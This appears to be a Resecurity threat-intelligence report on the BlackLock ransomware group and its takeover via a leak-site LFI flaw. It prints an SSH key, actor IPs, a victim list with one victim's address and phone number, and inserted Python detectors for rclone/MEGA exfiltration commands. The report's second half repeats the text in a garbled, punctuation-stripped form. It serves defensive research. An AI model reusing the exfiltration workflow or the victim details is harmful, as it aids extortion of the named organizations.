Resecurity: BlackLock Ransomware, A Late Holiday Gift with Intrusion into the Threat Actors' Infrastructure

Cyber Threat Intelligence
Dubbed BlackLock (aka El Dorado or Eldorado), the ransomware-as-a-service (RaaS) outfit has existed since March 2024. In Q4 of last year it increased its number of data leak posts by a staggering 1,425% quarter-on-quarter. According to independent reporting, this relatively new group has rapidly accelerated attacks and could become the most dominant RaaS group in 2025.

Fortunately, it will not happen, due to certain events happening behind the scenes. As you may know, Christmas and the winter holidays are the best times for cybercriminals to attack, defraud and extort victims globally. But in some cases they may receive unexpected gifts too. Around that time, Resecurity identified a vulnerability in the Data Leak Site (DLS) of BlackLock in the TOR network, the successful exploitation of which allowed our analysts to collect substantial intelligence about their activity outside of the public domain.

Since that time, our analysts from the HUNTER team have been covertly acquiring critical and previously undisclosed artifacts related to the threat actors: network infrastructure, logs, the ISPs and hosting providers involved, timestamps of logins, and the associated file-sharing accounts at MEGA that the group created to store data stolen from the victims, which later got published via the DLS in TOR. The successful compromise of BlackLock's DLS allowed us to uncover a trove of information about the threat actors and their modus operandi (MO) and, more importantly, to predict and prevent some of their planned attacks and protect undisclosed victims by alerting them.

It is not enough to look at ransomware groups and design fancy reports counting the number of victims suffering from their activity. Resecurity believes a proactive, practical approach to disrupting cybercriminal chains is the key catalyst to combat ransomware activity worldwide. The BlackLock ransomware compromise is a unique case in which offensive cyber capabilities combined with threat intelligence research facilitated an investigation workflow to uncover critical insights and target the actors regardless of how sophisticated their operations are.

Local File Include (LFI) Vulnerability Exploitation
As of February 10, 2025, we identified 46 victims, involving organizations from different segments of the economy, including electronics, academia, religious organizations, defense, healthcare, technology, IT/MSP vendors and government agencies. The impacted organizations were based in Argentina, Aruba, Brazil, Canada, Congo, Croatia, Peru, France, Italy, Spain, the Netherlands, the United States, the United Kingdom and the UAE.

Resecurity has reason to believe the actors successfully compromised a significantly larger number of victims who are currently undisclosed due to ongoing extortion attempts by the actors and could still be published.
At least one victim from the critical infrastructure field has not been published at the DLS, and several others have been removed from the listing. As one key communication method, the group has leveraged an email account registered via Cyberfear.com, an anonymous email service also available in TOR.

January 14, 2025: the threat actors created a posting at a prominent underground community forum dedicated to ransomware called RAMP. In that posting they announced the launch of an underground affiliate network, inviting other cybercriminals to participate in monetizing their malicious activity by planting ransomware (malicious code delivered as a binary) and selling compromised access.

The posting encouraged other cybercriminals to contact the group via private message (PM) on the forum. Notably, the posting was written in Russian and Chinese.

The rules of the BlackLock affiliate platform warned cybercriminals who joined it not to target victims based in countries of the BRICS alliance, including Russia and China, as well as the Commonwealth of Independent States (CIS), which includes countries of the post-Soviet period. While the latter is a typical rule for cybercriminals originating from modern Eastern Europe, the reference to China is noteworthy.
The actor behind BlackLock Ransomware, under one alias, has links to two other ransomware projects: El Dorado and Mamona Ransomware. This is a unique case in which the same ransomware operator could manage three projects, successfully transitioning from one to another. For example, following a successful attack against New River Electrical from Ohio, El Dorado Ransomware actors also targeted the College of Veterinary Medicine, Kansas State University and the City of Pensacola, Florida, which later got published at the BlackLock Ransomware DLS.

The web interface of the El Dorado Ransomware DLS was different from BlackLock Ransomware's, but they shared an almost identical list of victims. This overlap may confirm a strong connection between these ransomware projects.

[Figure: El Dorado DLS]
[Figure: BlackLock DLS]

Independent cybersecurity researchers have also confirmed the connection between BlackLock Ransomware and El Dorado Ransomware in code and ransom notes. It is very common for ransomware operators to rebrand their projects; in some cases this is used as an OPSEC measure to confuse investigators.

March 11, 2025: the actor behind BlackLock Ransomware announced the launch of a new project called Mamona Ransomware.
Resecurity identified a misconfiguration in the Data Leak Site (DLS) of BlackLock Ransomware leading to the disclosure of clearnet IP addresses related to their network infrastructure behind the TOR hidden services hosting them, along with additional service information. The collected data allowed us to assist with further investigation and disruption of this cybercriminal activity.

The successful exploitation of a Local File Include (LFI) vulnerability allowed the collection of sensitive server-side information, including configuration files and credentials.

Resecurity invested substantial time in hash-cracking the threat actors' accounts to take over the infrastructure.

The acquired history of commands was probably one of the biggest OPSEC failures of BlackLock Ransomware. The collected artifacts included copy-pasted credentials the key actor managing the server used, and a detailed chronology of victims' data publication.

Ironically, one of the passwords copied by one of the actors managing the BlackLock Ransomware server was valid for several other associated accounts used by the group.

As an additional security measure, the DLS server was also protected by a digital certificate. Authorization on the server was not possible through a credentials set alone; an actual digital certificate issued by one of the administrators was required.

.ssh/authorized_keys file:

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDjd9zMm7DYooflblhb8b85Iq6mzwZzt7bAheyyZjcESMYWp3g6KJtZr20P3gJcN8G0KlGZ6ZrpxhfIvNAa1GQsdH4e84fg2ciTkDTudiP6aL90cR8paMoZnXvarrMg2S3legm8j1oi4B2L8xiAsyK6VfauY9Ikf4BQkyXzk9lKPhywOdmR66SbGZJP6jzFmp0hNWoirnGOs8bw413xfaxL6VRI4wqFE7ccf6wUleX7x4SnKrF7QNMr0S6EWf8LprzeSrTHCXRlOmFGurpsXn3CNmM2i5GLGdjaAvklHdniIOBXN1KuJR0mDDRpka6KIke0YbPwIjq5Fgvtn root@localhost

Integration with TOR was arranged using Lyrebird (obfs4proxy), which implements several pluggable transport protocols, including obfs4, meek and WebTunnel.
One of the key mechanisms of stolen data transfer was arranged via MEGA, a popular file-sharing service. BlackLock Ransomware created multiple accounts to facilitate the storage of data stolen from the victims.

To manage it effectively, BlackLock Ransomware used the rclone utility, and in some cases it also installed the MEGA client directly on the victims' systems.

Resecurity has acquired substantial intelligence about email accounts associated with MEGA folders managed by BlackLock Ransomware.

At least eight accounts created by the group in different timeframes were identified.

Using the rclone utility, BlackLock ransomware actors were moving troves of stolen data between MEGA accounts and the DLS.

The MEGA accounts have shared the stolen data from current and historical victims. At some point the actors also used MEGA as a backup method.
Some accounts got wiped after some time and were reused to upload newly stolen data.

January 10, 2025: Resecurity contacted the Canadian Centre for Cyber Security to share intelligence about data planned for publication from one of the victims based in Canada. Leveraging the access gained to BlackLock Ransomware infrastructure, our team collected information about the stolen data 13 days before its publication by the threat actors.

January 16, 2025: Resecurity reached out to CERT-FR (ANSSI) to share available intelligence about the planned publication of data from one of the victims based in France. Leveraging the access gained, our team could collect knowledge of the stolen data two days before its publication by the threat actors and share it with the appropriate authorities.

In that example, BlackLock Ransomware targeted a primary legal services provider.

The observed exfiltrated data belonged to the victim and to multiple customers from the EU and abroad using their services.

Notably, during the exfiltration the actors deployed the MEGA client on the victim's server to upload data covertly and evade detection.
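The rclone-to-MEGA and MEGA-client exfiltration pattern described above is something a defender can hunt for in process-creation telemetry. The following is an added example (not Resecurity's tooling and not from the original report): it flags rclone invocations whose target remote is the MEGA backend, including remotes that only reveal their backend type in an rclone config file, and MEGAcmd client binaries. The event records, the config text and the binary list are constructed sample data.

```python
import re
import shlex

# Constructed process-creation events (command lines only), in the shape a
# defender would pull from EDR or auditd. None of these are real logs.
SAMPLE_EVENTS = [
    {"host": "fs01", "user": "svc_backup",
     "cmd": "rclone copy /srv/share mega:exfil --transfers 16"},
    {"host": "fs01", "user": "svc_backup",
     "cmd": "rclone sync C:\\Finance remote1:dump --config C:\\Users\\Public\\r.conf"},
    {"host": "db02", "user": "admin",
     "cmd": "mega-put -c /var/backups/db.tar.gz /incoming"},
    {"host": "web03", "user": "www",
     "cmd": "rclone copy /var/log s3:audit-logs"},
    {"host": "ws11", "user": "jdoe", "cmd": "notepad.exe report.txt"},
]

# Constructed rclone config as it might be recovered from the --config path
# above. "type = mega" is how rclone names its MEGA backend, so a remote with
# an innocuous name ("remote1") still resolves to MEGA.
SAMPLE_RCLONE_CONF = """[remote1]
type = mega
user = someone@example.invalid
pass = <obscured>

[s3]
type = s3
"""

# Assumed list of MEGAcmd / MEGAsync executable names to watch for (example set).
MEGACMD_BINARIES = {"mega-put", "mega-cmd", "megacmd", "mega-login",
                    "mega-sync", "megaclient", "megasync"}

WIN_DRIVE_RE = re.compile(r"^[A-Za-z]:\\")


def mega_remotes_from_config(conf_text):
    """Return the names of rclone remotes whose backend type is mega."""
    remotes, current = set(), None
    for line in conf_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
        elif current and re.fullmatch(r"type\s*=\s*mega", line, re.I):
            remotes.add(current)
    return remotes


def classify_event(event, mega_remotes):
    """Return a finding label for one event, or None if it is benign."""
    try:
        # posix=False keeps Windows backslashes literal instead of treating
        # them as shell escapes.
        argv = shlex.split(event["cmd"], posix=False)
    except ValueError:
        return None
    if not argv:
        return None
    exe = argv[0].rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()
    exe = exe.removesuffix(".exe")
    if exe in MEGACMD_BINARIES:
        return "megacmd-client"
    if exe == "rclone":
        for arg in argv[1:]:
            if arg.startswith("-") or ":" not in arg or WIN_DRIVE_RE.match(arg):
                continue  # flag, plain path or Windows drive path: not a remote
            remote = arg.split(":", 1)[0]
            if remote.lower() == "mega" or remote in mega_remotes:
                return "rclone-to-mega"
    return None


def find_mega_exfil(events, conf_text=""):
    """Scan events and return (host, user, label) for each suspicious one."""
    mega_remotes = mega_remotes_from_config(conf_text)
    findings = []
    for ev in events:
        label = classify_event(ev, mega_remotes)
        if label:
            findings.append((ev["host"], ev["user"], label))
    return findings


if __name__ == "__main__":
    for hit in find_mega_exfil(SAMPLE_EVENTS, SAMPLE_RCLONE_CONF):
        print(*hit)
```

Without the recovered config file the second rclone event is missed, which is why pulling the referenced rclone config off the host matters as much as the command line itself.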
Resecurity leveraged the compromised accounts to observe the possible origin of threat actor activity.

The most notable IP addresses were originating from China and Russia. Of course, the actors could use proxies and VPN servers to stay anonymous, but some of the disclosed IPs showed particular trends.

One of the most valuable files is the log files revealing the IP addresses of the bad actors from the server side (SSH). Some of them overlapped with IP addresses seen for MEGA login sessions.

IP: 185.147.124.54
IP: 218.92.0.252

On January 26, 2025, the actors created an additional MEGA account and added it to the stolen data publication workflow.
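The overlap between server-side SSH logins and MEGA session IPs is a simple but effective correlation, and the detail that matters is counting only accepted logins rather than the background noise of failed attempts. The following is an added example of that correlation (not Resecurity's tooling and not from the original report); the sshd log lines and the MEGA session records are constructed, using TEST-NET addresses rather than any real indicator.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd auth.log excerpt in standard syslog format (not real data).
SAMPLE_SSHD_LOG = """Jan 20 03:14:07 dls sshd[1201]: Accepted publickey for root from 203.0.113.17 port 50122 ssh2: RSA SHA256:AAAA
Jan 20 03:14:07 dls sshd[1201]: pam_unix(sshd:session): session opened for user root by (uid=0)
Jan 21 22:41:55 dls sshd[1388]: Accepted publickey for root from 198.51.100.9 port 41880 ssh2: RSA SHA256:AAAA
Jan 22 01:02:03 dls sshd[1402]: Failed password for invalid user admin from 192.0.2.44 port 33012 ssh2
Jan 25 19:05:30 dls sshd[1577]: Accepted publickey for root from 203.0.113.17 port 50981 ssh2: RSA SHA256:AAAA
"""

# Constructed MEGA session history (account, source IP, ISO timestamp); the
# shape is assumed, MEGA's real export format may differ.
SAMPLE_MEGA_SESSIONS = [
    ("acct1@example.invalid", "203.0.113.17", "2025-01-20T03:30:00"),
    ("acct2@example.invalid", "192.0.2.44", "2025-01-22T01:10:00"),
    ("acct2@example.invalid", "198.51.100.200", "2025-01-23T10:00:00"),
]

# Only "Accepted <method> for <user> from <ip>" lines count as logins;
# "Failed password" scanner noise must not pollute the correlation.
ACCEPTED_RE = re.compile(
    r"^(?P<mon>\w{3}) (?P<day>\s?\d{1,2}) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_ssh_accepted(log_text, year=2025):
    """Return (user, ip, datetime) for each successful sshd login.

    Syslog lines carry no year, so the caller supplies it.
    """
    logins = []
    for line in log_text.splitlines():
        m = ACCEPTED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(
            f"{year} {m['mon']} {m['day'].strip()} {m['time']}", "%Y %b %d %H:%M:%S"
        )
        logins.append((m["user"], m["ip"], ts))
    return logins


def correlate(ssh_logins, mega_sessions):
    """Map each IP seen in both SSH logins and MEGA sessions to the evidence.

    Result: {ip: {"ssh_logins": [datetime, ...], "mega_accounts": {acct, ...}}}
    """
    ssh_by_ip = defaultdict(list)
    for _user, ip, ts in ssh_logins:
        ssh_by_ip[ip].append(ts)
    overlap = {}
    for acct, ip, _ts in mega_sessions:
        if ip in ssh_by_ip:
            entry = overlap.setdefault(
                ip, {"ssh_logins": sorted(ssh_by_ip[ip]), "mega_accounts": set()}
            )
            entry["mega_accounts"].add(acct)
    return overlap


if __name__ == "__main__":
    hits = correlate(parse_ssh_accepted(SAMPLE_SSHD_LOG), SAMPLE_MEGA_SESSIONS)
    for ip, ev in hits.items():
        print(ip, len(ev["ssh_logins"]), "ssh logins;", sorted(ev["mega_accounts"]))
```

In the sample, 192.0.2.44 appears in both sources but is excluded because its SSH activity was a failed password attempt, not an operator login.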
Resecurity monitored the accounts to detect newly compromised data and to identify and alert victims at an early stage. In total, our threat intelligence analysts collected over 7 TB of compromised data belonging to various victims.

February 26, 2025: Resecurity established contact with a BlackLock Ransomware representative managing the affiliate network via TOX IM.

March 01, 2025: the actor passed a ZIP with ransomware binaries along with a ransom note.

The provided ZIP contained six binaries: a ransomware payload designed for Windows, Linux and FreeBSD, and one bash script for ESXi.

After reverse engineering, multiple code fragments were almost identical to those used by another underground conglomerate, DragonForce Ransomware. Resecurity has published a detailed reverse engineering report describing the key modules.

The only difference is that DragonForce Ransomware samples have been coded using VC++. In contrast, the acquired samples from BlackLock Ransomware actors were written in Go, and the same pattern was applied to the El Dorado and BlackLock combo. It is possible the actors could leverage AI to convert specific fragments of the code with minimal modifications, or modify them. The observed ransom notes dropped on the victims' machines were also almost identical.
It is unclear if BlackLock Ransomware as a group started cooperating with DragonForce Ransomware or silently transitioned under new ownership. The new masters likely took over the project and its affiliate base because of ransomware market consolidation, understanding that their predecessors could be compromised.

On February 28, 2025, the key actor behind BlackLock Ransomware suddenly mentioned a possible exit scenario. It is unclear if the actor was aware of planned changes or suspected unexpected events.

Resecurity may not have been the only one who identified a vulnerability in the DLS of BlackLock and successfully exploited it. On March 20, 2025, the DLS of BlackLock was defaced and technically liquidated by posting the disclosed configuration files.

Notably, the hack was followed by the publication of chats presumably belonging to BlackLock Ransomware operators. While confirming the chats' authenticity is impossible, the publicized server-side files are authentic and match those acquired by Resecurity during the winter events. It seems DragonForce wanted to shame the group and compromise their operations to eliminate competitors. On the other hand, such tactics could also be used as a false flag to further the transition to a new project.

In parallel, the day before, the DLS of Mamona ransomware, managed by the same actor, was also defaced. The project did not last long: Karol Paciorek from CSIRT KNF identified a possible clearnet IP, which caused panic among affiliates. Facing OPSEC failures, the actor was left speechless. A DragonForce ransomware representative left a sarcastic comment at RAMP without providing any additional details about what led to these events.

Other members of the ransomware community expressed concerns about law enforcement's possible involvement in targeting the group and their associates. At the same time, the key actors continued to communicate, keeping the audience clueless.

The key actor did not show any surprise after the incidents with BlackLock and Mamona Ransomware. It is possible the actor was fully aware that his operations could already be compromised, so a silent exit from the previous project could be the most rational option. Notably, he has not indicated any anger toward DragonForce Ransomware representatives; on the contrary, he called them gentlemen, which may confirm these events could be coordinated between them.

The actor has also deleted all references to past ransomware projects and removed the DLS URLs from his signature at RAMP.

Both BlackLock and Mamona Ransomware went offline.

DragonForce ransomware will benefit from the changes on the ransomware scene as one of the most robust groups, with strong technical capabilities and organization. Nevertheless, the operators behind BlackLock, El Dorado and Mamona Ransomware received a "no place to hide" message: the cybercriminal ecosystem is extremely dynamic and adjusts to force majeure situations. Obviously, the group has suffered significant damage and is unlikely to be able to recover, as their affiliates may be concerned about cooperating with them now due to multiple OPSEC failures.

At the same time, bigger players like DragonForce may extend a helping hand, taking over their market share. Resecurity released a report on the recent activity of DragonForce, specifically regarding their targeting of Saudi Arabia, and will continue to monitor the group. It is expected that the group will accelerate its activities by building alliances with underground affiliates previously working with other ransomware operators.

Victim listing from the DLS (Website | Company | Country | Downloads | Vertical):

reesndt.ca | Rees NDT Inspection Services | Canada | 5850 | Business Services
evasair.com | EVAS Group | Canada | 71824 | Aviation
akantha.fr | Akantha | France | 388193 | Legal Services
hasaarg.com | HIDROCARBUROS ARGENTINOS SA | Argentina | 937918 | Industrial
datascan.com | Inventory Management and Counting Solutions | Texas, United States | 164085 | Technology
dgenviro.com | DG Enviro Group | Canada | 132628 | Business Services
relateinfotech.com | Relate Infotech | United Kingdom | 14927 |
acumengroup.us | Acumen Group | California, United States | 85460 | Technology
lightspeeddesign.com | Light Speed Design | Washington, United States | 245339 | Business Services
kandelaar.com | Kandelaar Electrotechniek | Netherlands | 706048 | Technology
fbchighsprings.org | First Baptist Church | Florida, United States | 290792 | Religious Organizations
www.midlandturbo.com | Midland Turbo | United Kingdom | 669088 | Technology
www.lalucky.com | LA LUCKY Brand | California, United States | 120257 | Business Services
tiendascarrion.com | Tiendas Carrion Fernandez | Spain | 967603 | Retail
bellstaxservice.com | Bells Tax Service | California, United States | 533152 | Business Services
pcafterhours.net | PC AfterHours | Minnesota, United States | 304375 | Technology
myrtlebeachcustomhomebuilder.com | Nations Homes Commercial Residential Construction | South Carolina, United States | 832767 | Business Services
phxcmp.com | The PHOENIX | Puerto Rico | 608588 | Technology
barranquitas.pr.gov | The Municipal Administration of Barranquitas and its Department of Finance | Puerto Rico | 515471 | Government
keizers.ca | Keizers Collision CSN Automotive | Canada | 380486 | Business Services
compraaruba.com | Compra LTD Aruba | Aruba | 346417 | Technology
bshsoft.com | Business Systems House FZLLC | United Arab Emirates | 1341397 | Technology
gccustommetal.com | GC Custom Metal Fabrications | Canada | 75755 | Industrial
datacampos.com | Data Campos Sistemas | Brazil | 31021 | Technology
cucinatagliani.com | Cucina Tagliani | USA | 370617 | Retail
mullenwylie.com | Mullen Wylie LLC | USA | 986992 | Legal Services
patricksanderscompany.com | Patrick Sanders and Company PC | USA | 28237 | Business Services
cityofpensacola.com | Pensacola | FL, USA | 2106604 | Government
a1mobilelock.com | A1 Mobile Lock Key | Washington, USA | 38951 | Business Services
adamshomes.com | Adams Homes | USA | 433175 | Business Services
tankerska.hr | TANKERSKA PLOVIDBA d.d. | Croatia | 342225 | Business Services
newriverelectrical.com | New River Electrical Corporation | USA | 665795 | Industrial
panzersolutions.com | Panzer Solutions LLC Business Services | USA | 508720 | Business Services
avioesforza.it | avioesforza.it | Italy | Visitors 16858 | Business Services
celplan.com | CelPlan Technologies Inc | USA | Visitors 75710 | Technology
allianceind.com | Alliance Industries LLC | USA | 233981 | Business Services
autorecyclers.com | A L Auto Recyclers | Canada | 146942 | Business Services
burotec.biz | BUROTEC SA | Republique du Congo | 21317 | Business Services
kennedyfunding.com | Kennedy Funding | New Jersey, USA | 426319 | Financial Services
goughconstruction.com | Gough Construction | Utah, USA | 4554 | Construction
htetech.com | HTE Technologies | Missouri, USA | 398790 | Technology
lindostar.it | LINDOSTAR | Italy | 4938 | Technology
premierpackaging.com | Premier Packaging | Tennessee, USA | 16366 | Business Services
tbmcg.com | TBM Consulting Group Inc | North Carolina, USA | 211568 | Business Services
uccretrievals.com | UCC Retrievals Inc | Virginia, USA | 170597 | Business Services
vet.k-state.edu | K-State College of Veterinary Medicine | KS, USA | 13143 | Education
atdamerican.com | ATD-American | USA | 472567 | Technology
fleetequipment.com | Fleet Equipment Center Inc | IL, USA | 7982 |
lasen.com | Lasen Inc | 2450 Lakeside Dr Suite B, Las Cruces NM 88007 (575 522 5110) | 25125 | Defense

Sources:

BlackLock Ransomware: What You Need To Know, https://www.tripwire.com/state-of-security/blacklock-ransomware-what-you-need-know
Researchers Confirm BlackLock as Eldorado Rebrand, https://www.infosecurity-magazine.com/news/researchers-confirm-blacklock/
BlackLock On Track to Be 2025's Most Prolific Ransomware Group, https://www.infosecurity-magazine.com/news/blacklock-2025s-most-prolific/
BlackLock Ransomware Hacked 40 Organization Within Two Months, https://cybersecuritynews.com/blacklock-ransomware-hacked-40-organization/
contactresecuritycom
pp
1 888 273 82 76
ppCopyright 2025 Resecurity Inc All rights reservedp
Dubbed
BlackLock
aka El
Dorado or
Eldorado
the ransomwareasaservice
RaaS outfit
has existed since March 2024 In Q4 of last year it increased its
number of data leak posts by a staggering 1425 quarteronquarter
According to independent reporting a relatively new group has
rapidly accelerated attacks and could become the most dominant RaaS
group in 2025pp
Fortunately
it will not happen due to certain events happening behind the
scenes As you may know Christmas and Winter Holidays are the
best times for cybercriminals to attack defraud and extort victims
globally But in some cases they may expect unexpected gifts too
Around that time Resecurity identified a vulnerability present at
the Data Leak Site DLS of BlackLock in the TOR network successful
exploitation of which allowed our analysts to collect substantial
intelligence about their activity outside of the public domainpp
Since
that time our analysts from the HUNTER team have been covertly
acquiring critical and previously undisclosed artifacts related to
threat actors network infrastructure logs ISPs and hosting
providers involved timestamps of logins associated filesharing
accounts at MEGA the group created to store stolen data from the
victims which later got published via DLS in TOR A successful
compromise of BlackLocks DLS allowed to uncover a trove of
information about the threat actors and their Modus Operandi MO
but more importantly to predict and prevent some of their planned
attacks and protect undisclosed victims by alerting themppIt is not enough to look at ransomware groups and design fancy reports counting the number of victims suffering from their activity Resecurity believes the proactive practical approach to disrupting cybercriminal chains is the key catalyst to combat ransomware activity worldwide Blacklock ransomware compromise is a unique case when offensive cyber combined with threat intelligence research capabilities facilitated investigation workflow to uncover critical insights and target the actors regardless of how sophisticated their operations areppLocal File Include LFI Vulnerability Exploitationpppp
As
of February
10 2025
we identified 46
victims
involving organizations from different segments of the economy
including electronics academia religious organizations defense
healthcare technology ITMSP vendors and government agencies The impacted organizations were based in Argentina Aruba Brazil Canada Congo Croatia Peru France Italy Spain the Netherlands the United States the United Kingdom and the UAEpppppp
Resecurity
has a reason to believe the actors successfully compromised a much
more significant number of victims who were currently undisclosed due
to ongoing extortion attempts by the actors or could be publishedpppppp
At
least one victim from the critical infrastructure field has not been
published at the DLS and several others have been removed from the
listing As one key communication method the group has leveraged the
email account registered via Cyberfearcom an anonymous email
service also available in TOR ppppJanuary
14 2025
Threat actors created a posting at a prominent underground community
forum dedicated to ransomware called RAMP In that posting
they announced the launch of an underground affiliate network
inviting other cybercriminals to participate in monetizing their
malicious activity by planting ransomware malicious code delivered
as binary and selling compromised accesspppp
The
posting encouraged other cybercriminals to contact the group via
private message PM via a forum Notably the posting was written in
Russian and Chinese language
ppppThe rules of the BlackLock affiliate platform warned cybercriminals who joined it not to target victims based in countries of the BRICS alliance including Russia and China as well as the Commonwealth of Independent States CIS which includes countries of postSoviet period While the latter is a typical rule for cybercriminals originating from modern Eastern Europe the reference to China is noteworthypp
The
actor behind BlackLock
Ransomware
under the alias has
links to two other ransomware projects El
Dorado and Mamona
Ransomware
This is a unique case when the same ransomware operator could
manage three
projects
successfully transitioning from one to another For example
following a successful attack against New River Electrical from
Ohio El
Dorado Ransomware actors
also targeted the College of Veterinary Medicine Kansas State
University and the City of Pensacola Florida which later got
published at BlackLock
Ransomware DLSpppp
The
web interface of El
Dorado Ransomware DLS
was different from BlackLock
Ransomwares
but they shared an almost identical list of victims This overlap may
confirm a strong connection between these ransomware projects ppppEl Dorado DLSppBlackLock DLSpppp
Independent
cybersecurity researchers have also confirmed the
connection between BlackLock
Ransomware and El
Dorado Ransomware in
code and ransomware notes It is very common for ransomware operators
to rebrand their projects in some cases this is used as an OPSEC
measure to confuse investigatorspp
March
11 2025
the actor behind BlackLock
Ransomware announced
the launch of a new project called Mamona
Ransomwarepppppp
Resecurity
identified a certain misconfiguration in the Data Leak Site DLS
of BlackLock
Ransomware
leading to clearnet IP addresses disclosure related to their network
infrastructure behind TOR hidden services hosting them and
additional service information The collected data allowed us to
assist with further investigation and disruption of this
cybercriminal activitypppppp
The
successful exploitation of Local
File Include LFI vulnerability allowed
the collection of sensitive serverside information including
configuration files and credentials pppppp
Resecurity
invested substantial time in hashcracking threat actors accounts
to take over the infrastructure pppppp
The
acquired history of commands was probably one of the biggest OPSEC
failures of Blacklock
Ransomware
The collected artifacts included copypasted credentials the key
actor managing the server used and a detailed chronology of victims
data publication pppppp
Ironically
one of the passwords copied by one of the actors managing the
BlackLock
Ransomware server
was valid for several other associated accounts used by the group pppppp
As
an additional security measure the DLS server was also protected by
a digital certificate The authorization on the server was not
possible only through a credentials set an actual digital
certificate was required to be issued by one of the administrators ppppsshauthorizedkeys fileppsshrsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDjd9zMm7DYooflblhb8b85Iq6mzwZzt7bAheyyZjcESMYWp3g6KJtZr20P3gJcN8G0KlGZ6ZrpxhfIvNAa1GQsdH4e84fg2ciTkDTudiP6aL90cR8paMoZnXvarrMg2S3legm8j1oi4B2L8xiAsyK6VfauY9Ikf4BQkyXzk9lKPhywOdmR66SbGZJP6jzFmp0hNWoirnGOs8bw413xfaxL6VRI4wqFE7ccf6wUleX7x4SnKrF7QNMr0S6EWf8LprzeSrTHCXRlOmFGurpsXn3CNmM2i5GLGdjaAvklHdniIOBXN1KuJR0mDDRpka6KIke0YbPwIjq5Fgvtn rootlocalhostpppp
Integration
with TOR was arranged using Lyrebirdobfs4proxy which implements
several pluggable transport protocols including obfs4 meek and
WebTunnelpppppp
One
of the key mechanisms of stolen data transfers was arranged via MEGA
a popular filesharing service Blacklock
Ransomware has
created multiple accounts to facilitate the storage of stolen data
from the victims pppppp
To
manage it effectively Blacklock
Ransomware used
the clone utility and in some cases it also installed the MEGA
client directly on the victims pppppp
Resecurity
has acquired substantial intelligence about email accounts associated
with MEGA folders managed by Blacklock
Ransomwarepppppp
There
were identified at least eight
accounts created
by the group in different timeframespppp
Using rclone utility BlackLock ransomware actors were moving troves of stolen data between MEGA accounts and DLSppMEGA accounts have shared the stolen data from current and historical victims At some point the actors also
used MEGA as a backup methodpppppp
Some
accounts got wiped after some time and reused to upload new stolen
data ppppJanuary
10 2025
Resecurity has contacted the Canadian
Centre for Cyber Security to
share intelligence about planned data for publication from one of the
victims based in Canada Leveraging gained access to BlackLock
Ransomware infrastructure
our team collected information about the stolen data 13
days before its publication by
the threat actorsppJanuary
16 2025Resecurity
reached out to CERTFRANSSI to
share available intelligence about planned data publication from one
of the victims based in France Leveraging the access gained our
team could collect knowledge of the stolen data two
days before publication by
the threat actors and share it with the appropriate authoritiespppp
In
that example BlackLock
Ransomware targeted
a primary legal services providerpppppp
The
observed exfiltrated data belonged to the victim and multiple
customers from the EU and abroad using their services pppppp
Notably
during the exfiltration the actors deployed the MEGA client on the
victims server to upload data covertly and evade detection pppppp
Resecurity
leveraged compromised accounts to observe the possible origin of
threat actor activitypppppp
The
most notable IP addresses were originating from China and Russia Of
course the actors could use proxies and VPN servers anonymously but
some disclosed IPs showed particular trends pppppp
One
of the most valuable files is log files revealing the IP addresses of
the bad actors from the server side SSH Some of them
overlapped with IP addresses seen for MEGA login sessionsppppIP 18514712454ppIP 218920252ppOn
January 26 2025
the actors created an additional MEGA account and added it to the
stolen data publication workflowpppp
Resecurity
monitored the accounts to detect new compromised data and identify
and alert victims at an early stage In total our threat intelligence analysts collected over 7 TB of compromised data belonging to various victimsppppFebruary
26 2025
Resecurity established contact with a BlackLock
Ransomware representative
managing the affiliate network via TOX IM ppMarch
01 2025
the actor passed a ZIP with ransomware binaries along with a
ransomware notepppp
The
provided ZIP contained six binaries a ransomware payload designed
for Windows Linux and FreeBSD and one bash script for ESXi pppppp
After
reverse engineering multiple code fragments were almost identical to
those used by another underground conglomerate DragonForce
Ransomware
Resecurity has published a detailed reverse engineering
report describing the key modulespppppp
The
only difference is that DragonForce
Ransomware samples
have been coded using VC In contrast the acquired samples
from BlackLock
Ransomware actors
were written in Go and the same pattern was applied to the El Dorado
and BlackLock combo It is possible the actors could leverage AI to
convert specific fragments of the code with minimal modifications or
modify them The observed ransom notes dropped on the victims
machine were also almost identicalpppppp
It
is unclear if BlackLock
Ransomware as
a group started cooperating with DragonForce
Ransomware
or silently transitioned under the new ownership The new masters
likely took over the project and their affiliate base because of
ransomware market consolidation understanding their previous
successors could be compromisedpp
On
February 28 2025
the key actor behind BlackLock
Ransomware suddenly
mentioned a possible exit scenario It is unclear if the
actor was aware of planned changes or suspected unexpected
events pppppp
Resecurity
may not have been the only one who identified a vulnerability in the
DLS of BlackLock and successfully exploited it On March
20 2025
the DLS of BlackLock was defaced and technically liquidated by
posting the disclosed configuration filespppppp
Notably
the hack was followed by the publication of chat presumably belonging
to BlackLock
Ransomware operators
While confirming the chats authenticity is impossible the
publicized serverside files are authentic to those acquired by
Resecurity during the winter events It seems DragonForce wanted to
shame the group and compromise their operations to eliminate
competitors On the other hand such tactics could also be used as a
false flag to further transition to a new project ppppIn parallel the day before the DLS of Mamona ransomware managed by the same actor has also been defaced The project did not last long Karol Paciorek from CSIRT KNF identified a possible clearnet IP which caused panic among affiliates Facing OPSEC failures the actor was left speechless DragonForce ransomware representative left a sarcastic comment at RAMP without providing any additional details leading to these eventspppp
Other members of the ransomware community expressed concerns about law enforcement's possible involvement in targeting the group and their associates. At the same time, the key actors continued to communicate, keeping the audience clueless.
The key actor did not show any surprise after the incidents with BlackLock and Mamona Ransomware. It is possible the actor was fully aware that his operations could already be compromised, so a silent exit from the previous project could be the most rational option. Notably, he has not indicated any anger toward DragonForce Ransomware representatives; on the contrary, he called them "gentlemen", which may confirm these events could be coordinated between them.

The actor has also deleted all references to past ransomware projects and removed the DLS URLs from his signature at RAMP.

Both BlackLock and Mamona Ransomware went offline.

